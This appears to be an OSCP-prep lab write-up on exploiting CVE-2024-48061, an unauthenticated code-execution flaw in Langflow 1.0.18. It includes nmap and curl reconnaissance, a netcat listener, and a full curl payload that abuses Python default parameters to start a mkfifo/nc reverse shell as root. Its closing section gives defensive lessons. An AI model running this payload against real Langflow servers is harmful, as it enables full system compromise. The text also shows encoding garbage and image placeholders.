Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

Step 1: Reconnaissance

Nmap Scan

nmap -sCV -A โ€” min-rate 1000 192.168.224.117 -p-

None

Two ports were found:

โ€ข 22/tcp โ€” OpenSSH 9.6p1 Ubuntu

  • 7860/tcp โ€” Uvicorn HTTP server running Langflow AI workflow builder

Web Browser

None

Version Identification

curl -s http://192.168.224.117:7860/api/v1/version

None

Version 1.0.18 confirmed โ€” this is vulnerable to CVE-2024โ€“48061. All versions <= 1.0.18 are affected.

Step 2: Vulnerability Analysis โ€” CVE-2024โ€“48061

About the Vulnerability

CVE-2024โ€“48061 is a critical (CVSS 9.8) unauthenticated remote code execution vulnerability in Langflow <= 1.0.18. The /api/v1/validate/code endpoint accepts Python code and validates it using exec() without any sandboxing. This means any code submitted runs directly on the server in the local environment.

None

Vulnerable Code Path

None

Exploitation Technique โ€” Function Default Parameter

Python evaluates function default parameters immediately when the function is defined โ€” not when it is called. By embedding our malicious code as a default parameter value, exec() triggers execution the moment it processes the function definition

None

Step 3: Exploitation

Step 3.1 โ€” Start Netcat Listener

nc -lvnp 4444

None

Step 3.2 โ€” Send Exploit Payload

curl -s -X POST "http://192.168.224.117:7860/api/v1/validate/code" \

-H "Content-Type: application/json" \

  • d '{"code": "def exploit(x=__import__(\"os\").system(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.186 4444 >/tmp/f\")):\n pass"}'
None

Step 3.3 โ€” Shell Received

None

Langflow was running as root. The function default parameter trick triggered our reverse shell the moment exec() processed the function definition, giving us immediate root access.

Step 4: Capture Flag

cat /root/proof.txt

None

Key Learnings

โ€ข CVE-2024โ€“48061 โ€” Langflow's /api/v1/validate/code endpoint passes user-supplied Python code directly to exec() without any sandboxing. This allows any unauthenticated attacker to execute arbitrary code on the server.

โ€ข Default Parameter Trick โ€” Python evaluates function default parameters immediately at function definition time, not at call time. Embedding os.system() as a default parameter triggers execution the moment exec() processes the function definition.

โ€ข __import__() Bypass โ€” __import__('os') is Python's built-in import function that works even in restricted exec() contexts where the import statement may be blocked.

โ€ข Root Process โ€” Langflow was running as root, turning a code injection vulnerability into complete system compromise. Services should always run with least privilege.

โ€ข No Authentication โ€” The /api/v1/validate/code endpoint required no authentication, making it exploitable by any attacker who can reach the service. AI/ML frameworks should always enforce authentication on code execution endpoints.